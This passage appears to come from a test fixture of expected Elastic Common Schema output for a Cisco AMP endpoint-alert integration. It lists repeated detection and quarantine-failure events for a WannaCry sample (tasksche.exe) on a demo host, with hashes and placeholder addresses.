"alert", + "action": "Quarantine Failure", + "id": "6419275394960065000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419275394960064594", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843780555Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419275394960065000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Variant:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + 
"connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419275394960064606", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843782466Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419275394960065000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Variant:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419275394960064605", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha1": 
"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843784355Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419275394960065000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Variant:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419275394960064607", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha1": 
"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843786245Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419275394960065000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Variant:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419275394960064604", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha1": 
"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843788123Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":876000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419275394960065000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Variant:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419275394960064603", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha1": 
"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843790009Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":845000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419275394960065000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Variant:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419275394960064602", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha1": 
"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843791900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":798000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419275394960065000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Variant:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419275394960064601", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha1": 
"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843793783Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":767000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419275394960065000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Variant:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419275394960064598", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha1": 
